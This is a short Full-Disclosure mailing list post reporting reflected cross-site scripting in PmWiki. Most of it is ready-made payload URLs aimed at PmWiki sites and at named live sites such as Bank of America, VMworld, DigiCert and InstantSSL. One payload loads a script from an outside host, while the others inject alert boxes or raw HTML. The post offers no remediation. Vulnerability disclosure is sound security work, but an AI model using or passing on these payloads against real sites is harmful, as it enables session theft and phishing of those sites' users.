xss in PmWiki

[dave b <db.pub.mail () gmail com>]

Hi you can xss pmwiki like this:
http://dtcsupport.gplhost.com/Main/WikiSandbox?from=%22/%3E%3Cbody%20onload=alert%281%29%3E

Also the above it seems to behave differently across versions of pmwiki.
If it doesn't work ...html injection like this should:
http://www.pmwiki.org/wiki/Main/WikiSandbox?from=%22/%3E%3Cinput%3E

Oh if you bothered to read this far... here have some more xss:
http://www.bankofamerica.com/remax/?siteid=%22/%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E
http://www.vmworld.com/registration.jspa?sponsorCode=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.digicert.com/custsupport/legal_policies_table.php?color=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://secure.instantssl.com/renew/index.html?u=%22/%3E%3Cscript%3Ealert%28%27puddi%20puddi%27%29;%3C/script%3Exxx

--
Always the dullness of the fool is the whetstone of the wits.           --
William Shakespeare, "As You Like It

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/